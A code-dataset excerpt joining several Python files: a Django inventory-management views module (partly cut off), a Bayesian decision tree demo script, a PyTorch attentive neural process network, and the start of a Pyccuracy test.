request.POST.get('ref_no')\n bincard_form.item_code = request.POST.get('item_code')\n bincard_form.item_name = request.POST.get('item_name')\n bincard_form.date = request.POST.get('buy_onDate')\n bincard_form.job_no = request.POST.get('buy_underJob')\n bincard_form.entry_qty = request.POST.get('item_quantity')\n # bincard_form.issued_qty = request.POST.get('buy_onDate')\n bincard_form.receiver = request.POST.get('item_user')\n bincard_form.balance = request.POST.get('item_quantity')\n bincard_form.min_balance = request.POST.get('min_balance')\n bincard_form.item_unit = request.POST.get('item_unit')\n bincard_form.save()\n print(\"Bin Card Save!\")\n context = {\n 'submitted': submitted,\n 'error_msg': error_msg,\n 'p_code': p_code\n\n }\n return render(request, \"main_store/product_store_form.html\", context)\n\n\n@login_required(login_url='login')\ndef existing_product_store(request):\n submitted = False\n error_msg = \"\"\n p_code = \"\"\n p_job_no = \"\"\n p_min_balance = ''\n if request.method == 'POST':\n if '_save' in request.POST:\n p_code = request.POST.get('item_code')\n p_job_no = request.POST.get('buy_underJob')\n p_code_error = ProductStore.objects.filter(Q(item_code=p_code)) # Q(buy_underJob=p_job_no)\n if not p_code_error:\n error_msg = \": This Product Code is not registered. Try with registered Product Code or \" \\\n \"Registration by new entry.\"\n else:\n # these request come from template.\n form = ProductStore()\n form.item_code = p_code\n form.item_name = request.POST.get('item_name')\n form.item_quantity = request.POST.get('item_quantity')\n form.item_unit = request.POST.get('item_unit')\n form.ref_no = request.POST.get('ref_no')\n form.buy_onDate = request.POST.get('buy_onDate')\n form.buy_underJob = p_job_no\n form.item_user = request.POST.get('item_user')\n exp_date = request.POST.get('expire_date')\n if exp_date:\n form.expire_date = exp_date\n form.recorder = request.POST.get('recorder')\n\n # request come from name & code table.\n auto_input = ProductCodeName.objects.get(Q(code=p_code))\n form.item_location = auto_input.location\n p_min_balance = auto_input.min_balance\n form.min_balance = p_min_balance\n form.item_picture = auto_input.item_picture\n form.save()\n print(\"Existing Form Save!\")\n\n update_product = BinCardInfo.objects.filter(Q(item_code=p_code)) #\n if update_product:\n # Bin Card table data update here...\n bincard_balance = request.POST.get('item_quantity')\n bincard_date = request.POST.get('buy_onDate')\n bincard_ref_no = request.POST.get('ref_no')\n received_shop = request.POST.get('item_user')\n target_item_query = BinCardInfo.objects.filter(Q(item_code=p_code))\n if target_item_query:\n for target_item in target_item_query:\n target_item.balance = float(target_item.balance) + float(bincard_balance)\n target_item.date = bincard_date\n target_item.ref_no = bincard_ref_no\n target_item.entry_qty = bincard_balance\n target_item.save()\n submitted = True\n print(\"Bin Card Updated!\")\n else:\n # Bin Card table data inserted here ...\n bincard_form = BinCardInfo()\n bincard_form.ref_no = request.POST.get('ref_no')\n bincard_form.item_code = p_code\n bincard_form.item_name = request.POST.get('item_name')\n bincard_form.date = request.POST.get('buy_onDate')\n bincard_form.job_no = p_job_no\n bincard_form.entry_qty = request.POST.get('item_quantity')\n # bincard_form.issued_qty = request.POST.get('buy_onDate')\n bincard_form.receiver = request.POST.get('item_user')\n bincard_form.balance = request.POST.get('item_quantity')\n bincard_form.min_balance = p_min_balance\n bincard_form.item_unit = request.POST.get('item_unit')\n bincard_form.save()\n print(\"Bin Card Save!\")\n context = {\n 'submitted': submitted,\n 'error_msg': error_msg,\n 'p_code': p_code,\n 'p_job_no': p_job_no\n\n }\n return render(request, \"main_store/Existing_product_store_form.html\", context)\n\n\ndef bin_card_state(request):\n search_item_query = None\n total = 0\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n search_item_query = ProductStore.objects.filter(Q(item_code=p_code) | Q(item_name__icontains=p_code) |\n Q(item_quantity=p_code) | Q(item_location=p_code) |\n Q(buy_underJob=p_code))\n for search_item in search_item_query:\n total = total + int(search_item.item_quantity)\n\n context = {\n 'search_item_query': search_item_query,\n 'total': total,\n\n }\n return render(request, \"main_store/bin_card_state.html\", context)\n\n\ndef issuer_state(request):\n search_query_set = None\n total_issue = 0\n item_unit = ''\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n search_query_set = ProductIssue.objects.filter(Q(sr_no=p_code) | Q(job_no=p_code) |\n Q(received_shop=p_code) | Q(item_code=p_code) |\n Q(item_name__icontains=p_code) | Q(item_quantity=p_code))\n\n for item_wise in search_query_set:\n total_issue = float(total_issue) + float(item_wise.item_quantity)\n item_unit = item_wise.item_unit \n context = {\n 'search_query_set': search_query_set,\n 'total_issue': total_issue,\n 'item_unit': item_unit\n\n }\n return render(request, \"main_store/bin_card_issuer.html\", context)\n\n\ndef purchase_state(request):\n search_query_set = None\n total_purchase = 0\n item_unit = ''\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n search_query_set = ProductStore.objects.filter(Q(ref_no=p_code) | Q(buy_underJob=p_code)\n | Q(item_code=p_code) | Q(item_name__icontains=p_code) |\n Q(item_user__icontains=p_code))\n for item_wise in search_query_set:\n total_purchase = float(total_purchase) + float(item_wise.item_quantity)\n item_unit = item_wise.item_unit \n context = {\n 'search_query_set': search_query_set,\n 'total_purchase': total_purchase,\n 'item_unit': item_unit\n\n }\n return render(request, \"main_store/store_state.html\", context)\n\n\ndef product_name_code(request):\n search_query_set = \"\"\n sl_no = 0\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n group_name = request.POST.get('group_name')\n if p_code and not group_name:\n search_query_set = ProductCodeName.objects.filter(Q(name__icontains=p_code) | Q(code__icontains=p_code)\n | Q(location__icontains=p_code))\n print(\"Search\")\n elif group_name and not p_code:\n search_query_set = ProductCodeName.objects.filter(Q(item_under_group=group_name))\n print(\"Group Name\")\n elif group_name and p_code:\n search_query_set = ProductCodeName.objects.filter((Q(name__icontains=p_code) | Q(code__icontains=p_code)\n | Q(location__icontains=p_code)) &\n Q(item_under_group=group_name))\n print(\"Group Name & search\")\n context = {\n 'search_query_set': search_query_set,\n\n }\n return render(request, 'main_store/product_code_name.html', context)\n\n\ndef low_balance_state(request):\n min_balance_list = []\n min_balance_filter = []\n search_query_set = BinCardInfo.objects.all()\n for search_query in search_query_set:\n if search_query.min_balance:\n if float(search_query.min_balance) >= float(search_query.balance):\n min_balance_list.append(search_query)\n if request.method == 'POST':\n if '_search' in request.POST:\n search_key = request.POST.get('search')\n search_query_filter = ProductStore.objects.filter(\n Q(item_code=search_key) | Q(item_name__icontains=search_key) |\n Q(job_no__icontains=search_key))\n for search_filter in search_query_filter:\n if search_filter.min_balance and search_filter.item_quantity:\n if float(search_filter.min_balance) >= float(search_filter.item_quantity):\n min_balance_filter.append(search_filter)\n context = {\n 'min_balance_filter': min_balance_filter,\n 'min_balance_list': min_balance_list,\n\n }\n return render(request, 'main_store/low_balance.html', context)\n\n\ndef expire_date_state(request):\n current_date = date.today()\n p_code = '112211'\n expired_list = []\n expired_list_filter = []\n diff = ''\n search_query_set = ProductStore.objects.all()\n for search_query in search_query_set:\n last_date = search_query.expire_date\n if last_date:\n diff = last_date - current_date\n if diff.days < 60:\n expired_list.append(search_query)\n if request.method == 'POST':\n if '_search' in request.POST:\n search_key = request.POST.get('search')\n search_query_filter = ProductStore.objects.filter(\n Q(item_code=search_key) | Q(item_name__icontains=search_key) |\n Q(buy_underJob=search_key) | Q(item_user__icontains=search_key))\n for search_filter in search_query_filter:\n last_date = search_filter.expire_date\n diff = (last_date - current_date)\n if diff.days < 60:\n expired_list_filter.append(search_filter)\n print(expired_list)\n context = {\n 'expired_list': expired_list,\n 'expired_list_filter': expired_list_filter,\n\n }\n return render(request, 'main_store/expire_date_list.html', context)\n\n\n# Auto Complete Function for show Product Code from Product CodeName Table.\ndef autocomplete(request):\n if 'term' in request.GET:\n qs = ProductCodeName.objects.filter(code__icontains=request.GET.get('term'))\n titles = list()\n for product_name in qs:\n titles.append(product_name.code)\n return JsonResponse(titles, safe=False)\n return render(request, 'main_store/Existing_product_store_form.html')\n\n\n# Auto Complete Function for show Product Job Number from Product Store Table.\ndef autocomplete_job_no(request):\n if 'term' in request.GET:\n qs = ProductStore.objects.filter(buy_underJob__icontains=request.GET.get('term'))\n job_no = list()\n for product_job in qs:\n job_no.append(product_job.buy_underJob)\n return JsonResponse(job_no, safe=False)\n return render(request, 'main_store/Existing_product_store_form.html')\n\n\ndef material_balance_state(request):\n search_query_set = None\n total = 0\n unit = ''\n if request.method == 'POST':\n if '_search' in request.POST:\n p_code = request.POST.get('search')\n search_query_set = BinCardInfo.objects.filter(Q(ref_no=p_code) | Q(job_no=p_code)\n | Q(item_code=p_code) | Q(item_name__icontains=p_code))\n for search_item in search_query_set:\n total = total + float(search_item.balance)\n unit = search_item.item_unit\n context = {\n 'search_query_set': search_query_set,\n 'total': total,\n 'unit': unit\n }\n return render(request, 'main_store/mat_balance_state.html', context)\n\n\ndef quality_receive(request):\n if request.method == 'POST':\n if '_search' in request.POST:\n target_quality_no = request.POST.get('quality_no_search')\n print(target_quality_no)\n return redirect('material_quality', quality_no=target_quality_no)\n\n context = {\n\n }\n return render(request, \"main_store/quality_no_search_form.html\", context)\n\n\ndef material_quality(request, quality_no):\n quality_no = quality_no\n quality_data = MaterialQuality.objects.get(Q(quality_no=quality_no))\n quality_item = QualityItemList.objects.filter(Q(quality_no=quality_no))\n if quality_data and quality_item:\n context = {\n \"quality_data\": quality_data,\n \"quality_item\": quality_item,\n }\n return render(request, 'main_store/quality_form.html', context)\n else:\n error_msg = 'Search Item Not Found'\n context = {\n\n }\n return render(request, 'main_store/quality_no_search_form.html', context)\n\n\ndef quality_input(request):\n target_item_query = ''\n submitted = ''\n submitted1 = ''\n form1 = MaterialQualityForm()\n if request.method == 'POST':\n if '_save1' in request.POST:\n quality_no = request.POST.get('quality_no')\n form = QualityItemListForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted1 = True\n print(\"Data Save Quality Item list!\")\n target_item_query = QualityItemList.objects.filter(Q(quality_no=quality_no))\n else:\n print('form not valid!')\n if request.method == 'POST':\n if '_save' in request.POST:\n form = MaterialQualityForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted = True\n print(\"Quality Report Submitted\")\n else:\n print(\"Form Not Valid\")\n context = {\n \"form1\": form1,\n 'target_item_query': target_item_query,\n 'submitted': submitted,\n 'submitted1': submitted1,\n }\n return render(request, 'main_store/quality_form_input.html', context)\n\n\ndef gate_pass(request):\n bincard_form = BinCardInfo()\n return render(request, 'main_store/gate_pass.html')\n\n\ndef sr_form(request):\n bincard_form = BinCardInfo()\n return render(request, 'main_store/sr_form.html')\n\n\ndef project_detail_store(request):\n user_name = \"প্রধান ভাণ্ডার\"\n context = {\n 'user_name': user_name,\n\n }\n return render(request, 'main_store/project-details_store.html', context)\n\n\ndef statement(request):\n total_buy = 0\n total_issue = 0\n if request.method == 'POST':\n start_date = request.POST.get('start_date')\n end_date = request.POST.get('end_date')\n product_name = request.POST.get('item_code') # receive product code from post method.\n p_job_name = request.POST.get('item_job_no')\n if p_job_name and product_name:\n purchase_info = ProductStore.objects.filter(Q(buy_underJob=p_job_name) & Q(item_code=product_name)\n & Q(buy_onDate__range=[start_date, end_date]))\n elif p_job_name and not product_name:\n purchase_info = ProductStore.objects.filter(Q(buy_underJob=p_job_name) &\n Q(buy_onDate__range=[start_date, end_date]))\n else:\n purchase_info = ProductStore.objects.filter(Q(item_code=product_name) &\n Q(buy_onDate__range=[start_date, end_date]))\n if purchase_info:\n for item_buy in purchase_info:\n total_buy = total_buy + float(item_buy.item_quantity)\n print(purchase_info)\n print(total_buy)\n if p_job_name and product_name:\n issue_info = ProductIssue.objects.filter(Q(job_no=p_job_name) & Q(item_code=product_name) &\n Q(date__range=[start_date, end_date]))\n elif p_job_name and not product_name:\n issue_info = ProductIssue.objects.filter(Q(job_no=p_job_name) &\n Q(date__range=[start_date, end_date]))\n else:\n issue_info = ProductIssue.objects.filter(Q(item_code=product_name) & Q(date__range=[start_date, end_date]))\n if issue_info:\n for item_issue in issue_info:\n total_issue = total_issue + float(item_issue.item_quantity)\n print(issue_info)\n print(total_issue)\n context = {\n 'purchase_info': purchase_info,\n 'issue_info': issue_info,\n 'total_issue': total_issue,\n 'total_buy': total_buy,\n 'start_date': start_date,\n 'end_date': end_date,\n }\n return render(request, 'main_store/statement.html', context)\n context = {\n\n }\n return render(request, 'main_store/statement.html', context)\n\n\n# Demo Product Code and Name from xlsc/Excel file.\nfrom main_store.models import DemoNameCode, DemoJobNumber\nfrom django.db.models import Count\nimport xlrd\nimport os\n\n\ndef demo_code_input(request):\n module_dir = os.path.dirname(__file__) # set file location. file located in main_store app folder\n file = os.path.join(module_dir, '01 Hardware_microsoft.xlsx') # set file location in django\n workbook = xlrd.open_workbook(file)\n print(workbook)\n sheet = workbook.sheet_by_index(0)\n for row in range(sheet.nrows):\n print(\"--------------------------\")\n obj_name_code = DemoNameCode()\n for col in range(sheet.ncols):\n if col == 0:\n print(\"Name: \", sheet.cell_value(row, col))\n obj_name_code.p_name = sheet.cell_value(row, col)\n elif col == 1:\n print(\"Code: \", sheet.cell_value(row, col))\n obj_name_code.p_code = sheet.cell_value(row, col)\n elif col == 2:\n print(\"Unit: \", sheet.cell_value(row, col))\n obj_name_code.p_unit = sheet.cell_value(row, col)\n elif col == 3:\n print(\"Item _under_group: \", sheet.cell_value(row, col))\n obj_name_code.item_under_group = sheet.cell_value(row, col)\n obj_name_code.save()\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef demo_job_name(request): # Job Number import from demo Excel file.\n module_dir = os.path.dirname(__file__) # set file location. file located in main_store app folder\n file = os.path.join(module_dir, '09Job Name.xlsx') # set file location in django\n workbook = xlrd.open_workbook(file)\n print(workbook)\n sheet = workbook.sheet_by_index(0)\n for row in range(sheet.nrows):\n print(\"--------------------------\")\n obj_job_name = DemoJobNumber()\n for col in range(sheet.ncols):\n if col == 0:\n print(\"Job No: \", sheet.cell_value(row, col))\n obj_job_name.job_no = sheet.cell_value(row, col)\n elif col == 1:\n print(\"Job Name: \", sheet.cell_value(row, col))\n obj_job_name.job_name = sheet.cell_value(row, col)\n elif col == 2:\n print(\"Job Type: \", sheet.cell_value(row, col))\n obj_job_name.job_type = sheet.cell_value(row, col)\n obj_job_name.save()\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef demo_job_name_delete(request): # Delete all Job Number in demo job name database.\n demo_job_no = DemoJobNumber.objects.all()\n demo_job_no.delete()\n context = {\n # 'demo_name': demo_name,\n }\n return render(request, 'main_store/demo_code_show.html', context)\n\n\ndef job_no_store(request): # Job Number import from demo job name database.\n job_no_dict = DemoJobNumber.objects.all()\n for job_no in job_no_dict:\n form2 = JobNumber()\n print(\"--------------------------\")\n form2.job_no = job_no.job_no\n print(\"Job No\", job_no.job_no)\n form2.job_name = job_no.job_name\n print(\"Job Name\", job_no.job_name)\n form2.job_type = job_no.job_type\n print(\"Job Type\", job_no.job_type)\n form2.save()\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef demo_code_show(request):\n demo_name = DemoNameCode.objects.all()\n context = {\n 'demo_name': demo_name,\n }\n return render(request, 'main_store/demo_code_show.html', context)\n\n\n# def demo_code_delete(request):\n# demo_name = DemoNameCode.objects.filter(Q(p_code=\" \"))\n# for name in demo_name:\n# print(name.p_name)\n# context = {\n# 'demo_name': demo_name,\n# }\n# return render(request, 'main_store/demo_code_show.html', context)\n\ndef duplicate_in_demo_code(request): # find and delete duplicate item name and code from database.\n dupes = DemoNameCode.objects.values('p_name').annotate(Count('id')).order_by().filter(id__count__gt=1)\n records = DemoNameCode.objects.filter(p_name__in=[item['p_name'] for item in dupes])\n print(records)\n records.delete()\n context = {\n 'demo_name': demo_name,\n }\n return render(request, 'main_store/demo_code_show.html', context)\n\n\ndef duplicate_in_p_name_code(request): # find and delete duplicate item name and code from database.\n dupes = ProductCodeName.objects.values('name').annotate(Count('id')).order_by().filter(id__count__gt=1)\n records = ProductCodeName.objects.filter(name__in=[item['name'] for item in dupes])\n print(records)\n records.delete()\n context = {\n # 'demo_name': demo_name,\n }\n return render(request, 'main_store/demo_code_show.html', context)\n\n\n# Product Name and code store from demo_code_and_name\ndef product_name_store(request):\n code_name_dict = DemoNameCode.objects.all()\n for code_name in code_name_dict:\n form2 = ProductCodeName()\n print(\"--------------------------\")\n form2.code = code_name.p_code\n print(\"Code\", code_name.p_code)\n form2.name = code_name.p_name\n print(\"Name\", code_name.p_name)\n form2.item_unit = code_name.p_unit\n print(\"Unit\", code_name.p_unit)\n form2.item_under_group = code_name.item_under_group\n print(\"Group\", code_name.item_under_group)\n form2.save()\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef item_group_name_change(request):\n name = \"Timber & Stationary\"\n group_name = ProductCodeName.objects.filter(Q(item_under_group=name))\n for group in group_name:\n print(\"--------------------------\")\n group.item_under_group = \"Timber and Stationary\"\n group.save()\n print(\"Group\", group.item_under_group)\n return render(request, 'main_store/demo_code_name.html')\n\n\ndef data_entry_statement(request):\n total_buy = 0\n total_issue = 0\n purchase_info = ''\n issue_info = ''\n if request.method == 'POST':\n start_date = request.POST.get('start_date')\n end_date = request.POST.get('end_date')\n issuer_name = request.POST.get('issuer_name') # receive product code from post method.\n if issuer_name:\n purchase_info = ProductStore.objects.filter(Q(recorder=issuer_name) & \n Q(buy_onDate__range=[start_date, end_date]))\n \n if purchase_info:\n for item_buy in purchase_info:\n total_buy = total_buy + float(item_buy.item_quantity)\n print(total_buy)\n if issuer_name:\n issue_info = ProductIssue.objects.filter(Q(issuer_name=issuer_name) &\n Q(date__range=[start_date, end_date]))\n if issue_info:\n for item_issue in issue_info:\n total_issue = total_issue + float(item_issue.item_quantity)\n print(issue_info)\n print(total_issue)\n context = {\n 'purchase_info': purchase_info,\n 'issue_info': issue_info,\n 'total_issue': total_issue,\n 'total_buy': total_buy,\n 'start_date': start_date,\n 'end_date': end_date,\n }\n return render(request, 'main_store/data_entry_statement.html', context)\n\n context = {\n\n }\n return render(request, 'main_store/data_entry_statement.html', context)\n\n\ndef indent_form(request):\n submitted = False\n if request.method == 'POST':\n if '_save' in request.POST:\n indent_no = request.POST.get('indent_no')\n form = IndentForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n submitted = True\n print(\"Data Save Indent Form\")\n else:\n print('Form not valid!')\n context = {\n 'submitted': submitted\n }\n return render(request, \"main_store/indent_form.html\", context)\n\n\ndef indent_box(request):\n indent_list = Indent.objects.all()\n context = {\n 'indent_list': indent_list\n }\n return render(request, \"main_store/mailbox_indent.html\", context)","sub_path":"main_store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":34973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"199707950","text":"import numpy as np\nfrom sklearn.metrics import accuracy_score\n\nfrom bayesian_decision_tree.classification import PerpendicularClassificationTree\nfrom examples import helper\n\n# demo script for classification (binary or multiclass) using classic, axis-normal splits\nif __name__ == '__main__':\n # proxies (in case you're running this behind a firewall)\n args = helper.parse_args()\n proxies = {\n 'http': args.http_proxy,\n 'https': args.https_proxy\n }\n\n # data set: uncomment one of the following sections\n\n # artificial 4-class data somewhat similar to the Ripley data\n # n_train = 500\n # n_test = 2000\n # x0 = [1, 3, 2, 4]\n # x1 = [1, 1, 3, 3]\n # sd = 0.7\n # X_train = np.zeros((n_train, 2))\n # y_train = np.zeros((n_train, 1))\n # X_test = np.zeros((n_test, 2))\n # y_test = np.zeros((n_test, 1))\n # np.random.seed(666)\n # for i in range(4):\n # X_train[i * n_train//4:(i + 1) * n_train//4, 0] = np.random.normal(x0[i], sd, n_train//4)\n # X_train[i * n_train//4:(i + 1) * n_train//4, 1] = np.random.normal(x1[i], sd, n_train//4)\n # y_train[i * n_train//4:(i + 1) * n_train//4] = i\n #\n # X_test[i * n_test//4:(i + 1) * n_test//4, 0] = np.random.normal(x0[i], sd, n_test//4)\n # X_test[i * n_test//4:(i + 1) * n_test//4, 1] = np.random.normal(x1[i], sd, n_test//4)\n # y_test[i * n_test//4:(i + 1) * n_test//4] = i\n # train = np.hstack((X_train, y_train))\n # test = np.hstack((X_test, y_test))\n\n # np.random.seed(5)\n #\n # n = 10000\n # X_train = np.random.uniform(0, 4, (n, 2))\n # y_train = np.zeros((n, 1))\n # y_train[(X_train[:, 0] >= 1) & (X_train[:, 0] < 2) & (X_train[:, 1] <= 3)] = 1\n # y_train[(X_train[:, 0] >= 2) & (X_train[:, 0] < 3) & (X_train[:, 1] <= 1)] = 1\n # y_train[(X_train[:, 0] >= 3)] = 1\n #\n # angle = 30*np.pi/180\n # X_train_rot = X_train.copy()\n # X_train_rot[:, 0] = np.cos(angle)*X_train[:, 0] + np.sin(angle)*X_train[:, 1]\n # X_train_rot[:, 1] = -np.sin(angle)*X_train[:, 0] + np.cos(angle)*X_train[:, 1]\n # X_train = X_train_rot\n #\n # train = np.hstack((X_train, y_train))\n # test = train\n\n # or, alternatively, load a UCI dataset\n train, test = helper.load_ripley(proxies)\n\n n_dim = len(np.unique(train[:, -1]))\n\n if train is test:\n # perform a 50:50 train:test split if no test data is given\n train = train[0::2]\n test = test[1::2]\n\n X_train = train[:, :-1]\n y_train = train[:, -1]\n X_test = test[:, :-1]\n y_test = test[:, -1]\n\n # prior\n prior_pseudo_observations = 1\n prior = prior_pseudo_observations * np.ones(n_dim)\n\n # model\n model = PerpendicularClassificationTree(\n partition_prior=0.9,\n prior=prior,\n delta=0,\n prune=True)\n\n # train\n model.fit(X_train, y_train)\n print(model)\n print()\n print('Tree depth and number of leaves: {}, {}'.format(model.get_depth(), model.get_n_leaves()))\n print('Feature importance:', model.feature_importance())\n\n # compute accuracy\n y_pred_train = model.predict(X_train)\n y_pred_test = model.predict(X_test)\n accuracy_train = accuracy_score(y_train, y_pred_train)\n accuracy_test = accuracy_score(y_test, y_pred_test)\n info_train = 'Train accuracy: {:.4f} %'.format(100 * accuracy_train)\n info_test = 'Test accuracy: {:.4f} %'.format(100 * accuracy_test)\n print(info_train)\n print(info_test)\n\n from sklearn.metrics import roc_curve\n print(roc_curve(y_train, model.predict_proba(X_train)[:, 1]))\n\n # plot if 1D or 2D\n dimensions = X_train.shape[1]\n if dimensions == 1:\n helper.plot_1d_perpendicular(model, X_train, y_train, info_train, X_test, y_test, info_test)\n elif dimensions == 2:\n helper.plot_2d_perpendicular(model, X_train, y_train, info_train, X_test, y_test, info_test)\n","sub_path":"Package/bayesian_tree/examples/demo_classification_perpendicular.py","file_name":"demo_classification_perpendicular.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"372408279","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom networks.models import AttnLinear, ImageEncoder, NPDecoder\nfrom networks.performer_pytorch import FastAttention\nfrom utils import save_config\n\n\nclass ANPDistractor(nn.Module):\n \"\"\"\n ANP for Distractor\n \"\"\"\n def __init__(self, config):\n super(ANPDistractor, self).__init__()\n self.device = config.device\n self.img_size = config.img_size\n self.img_channels = self.img_size[2] - 1 if config.task == \"shapenet_3d\" else self.img_size[2]\n self.task_num = config.tasks_per_batch\n self.label_dim = config.input_dim\n self.agg_mode = config.agg_mode\n self.img_agg = config.img_agg\n self.y_dim = config.output_dim\n self.dim_w = config.dim_w\n self.save_latent_z = config.save_latent_z\n seed = config.seed\n torch.manual_seed(seed) # make network initialization fixed\n\n self.img_encoder = ImageEncoder(aggregate=self.img_agg, task_num=self.task_num, img_channels=self.img_channels)\n\n self.transform_y = nn.Linear(self.label_dim, self.dim_w)\n\n self.task_encoder = nn.Sequential(\n nn.Linear(256 + self.dim_w, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Linear(256, 256),\n nn.ReLU(),\n )\n self.mu = nn.Linear(256, 256)\n self.decoder = NPDecoder(aggregate=self.img_agg, output_dim=self.y_dim, task_num=self.task_num, img_channels=self.img_channels, img_size=self.img_size)\n\n # attention block\n h_dim = 256\n n_heads = 8\n self._W_k = nn.ModuleList(\n [AttnLinear(h_dim, h_dim) for _ in range(n_heads)]\n )\n self._W_v = nn.ModuleList(\n [AttnLinear(h_dim, h_dim) for _ in range(n_heads)]\n )\n self._W_q = nn.ModuleList(\n [AttnLinear(h_dim, h_dim) for _ in range(n_heads)]\n )\n self._W = AttnLinear(n_heads * h_dim, h_dim)\n self.attn = FastAttention(dim_heads=256,\n # nb_features=nb_features,\n causal=False)\n self._attention_func = self._multihead_attention\n self.n_heads = n_heads\n\n def _multihead_attention(self, k, v, q):\n k_all = []\n v_all = []\n q_all = []\n\n for i in range(self.n_heads):\n k_ = self._W_k[i](k)\n v_ = self._W_v[i](v)\n q_ = self._W_q[i](q)\n\n k_all.append(k_)\n v_all.append(v_)\n q_all.append(q_)\n\n #out = self._dot_attention(k_, v_, q_)\n #outs.append(out)\n k_all = torch.stack(k_all, dim=1)\n v_all = torch.stack(v_all, dim=1)\n q_all = torch.stack(q_all, dim=1)\n outs = self.attn(q=q_all, k=k_all, v=v_all)\n outs = outs.permute(0,2,3,1).contiguous()\n outs = outs.view(outs.shape[0], outs.shape[1], -1)\n rep = self._W(outs)\n return rep\n\n def forward(self, batch_train_images, label_train, batch_test_images, test=False):\n \"\"\"\n\n :param img_context: context images\n :param img_target: target image\n :param y_target: target label (bar length)\n :return:\n \"\"\"\n\n self.test_num = batch_test_images.shape[1]\n self.ctx_num = batch_train_images.shape[1]\n if self.ctx_num:\n label_train = self.transform_y(label_train)\n batch_train_images = batch_train_images.reshape(-1, self.img_channels, self.img_size[0], self.img_size[1])\n batch_test_images = batch_test_images.reshape(-1, self.img_channels, self.img_size[0], self.img_size[1])\n x_ctx = self.img_encoder(batch_train_images)\n x_tgt = self.img_encoder(batch_test_images)\n\n x = torch.cat([x_ctx, label_train], dim=2)\n context_features = self.task_encoder(x)\n\n # attention\n context_features = self._attention_func(x_ctx, context_features, x_tgt)\n mu = self.mu(context_features)\n sample_features = mu\n else:\n sample_features = torch.ones(self.task_num, self.test_num, 256).to(self.device) * 0.0\n # log_variance = torch.ones(self.task_num, self.test_num, 256).to(self.device) * 1.0\n\n generated_angles, generated_var = self.decoder(batch_test_images, sample_features)\n\n kl = 0\n\n if self.save_latent_z:\n return generated_angles, generated_var, sample_features, kl\n elif not self.save_latent_z:\n return generated_angles, generated_var, kl\n\n def sample(self, mu, log_variance, test=False):\n if test:\n snum = self.test_num_samples\n else:\n snum = self.num_samples\n return self.sample_normal(mu, log_variance, snum, test)\n\n def sample_normal(self, mu, log_variance, num_samples, test):\n \"\"\"\n Generate samples from a parameterized normal distribution.\n :param mu: tf tensor - mean parameter of the distribution.\n :param log_variance: tf tensor - log variance of the distribution.\n :param num_samples: np scalar - number of samples to generate.\n :return: tf tensor - samples from distribution of size num_samples x dim(mu).\n \"\"\"\n eps = torch.randn(self.task_num, num_samples, mu.size(1)).to(self.device)\n variance = 1e-5 + F.softplus(log_variance)\n variance = variance.repeat(1, num_samples, 1)\n mu = mu.repeat(1, num_samples, 1)\n if test:\n return mu\n else:\n return mu + eps * torch.sqrt(variance)\n\n def visualize(self):\n latent_data = self.latent_data.cpu()\n self.TSNE.transform(latent_data[:, :-3], latent_data[:, -3:])\n self.TSNE.vis()\n\n def weight_init(self, m):\n if isinstance(m, nn.Conv2d):\n if self.init_type == 'normal':\n nn.init.kaiming_normal_(m.weight, a=0.1, mode='fan_in', nonlinearity=self.activation)\n # if m.bias is not None:\n # fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n # bound = 1 / math.sqrt(fan_in)\n # init.uniform_(self.bias, -bound, bound)\n elif self.init_type == 'uniform':\n m.weight.data.uniform_(-1.0, 1.0)\n\n # nn.init.kaiming_uniform_(m.weight, a=0.1, mode='fan_in', nonlinearity=self.activation)\n\n if isinstance(m, nn.Linear):\n if self.init_type == 'normal':\n nn.init.kaiming_normal_(m.weight, a=0.1, mode='fan_in', nonlinearity=self.activation)\n # if m.bias is not None:\n # fan_in, _ = nn.init._calculate_fan_in_and_fan_out(self.weight)\n # bound = 1 / math.sqrt(fan_in)\n # init.uniform_(self.bias, -bound, bound)\n elif self.init_type == 'uniform':\n m.weight.data.uniform_(-1.0, 1.0)\n\n # nn.init.kaiming_uniform_(m.weight, a=0.1, mode='fan_in', nonlinearity=self.activation)\n","sub_path":"networks/ANPDistractor.py","file_name":"ANPDistractor.py","file_ext":"py","file_size_in_byte":7038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"528845691","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Open Software License (\"OSL\") v. 3.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.opensource.org/licenses/osl-3.0.php\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport sys\nimport os\nsys.path.insert(0,os.path.abspath(__file__+\"/../../\"))\nfrom pyccuracy.errors import TestFailedError\nfrom pyccuracy.pyccuracy_core import *\n\nclass TestWaitForElementError(unittest.TestCase):\n\n def setUp(self):\n self.pyccuracy = PyccuracyCore()\n\n def test_invalid_path_is_used(self):\n result = self.pyccuracy.run_tests(file_pattern=\"test_wait_for_element_error.acc\",\n should_throw=False,\n report_file_name=\"invalidurlreport.html\")\n\n assert result.status == 'FAILED'\n assert result.failed_scenarios == 1\n error_message = str(result.stories[0].scenarios[0].whens[0].error)\n expected_message = u\"The action wait for page to load timed out after waiting for 10000 ms.\"\n assert error_message == expected_message, \"Expected different than actual:\\n\\nExpected:'%s'\\nActual: '%s'\" % (expected_message, 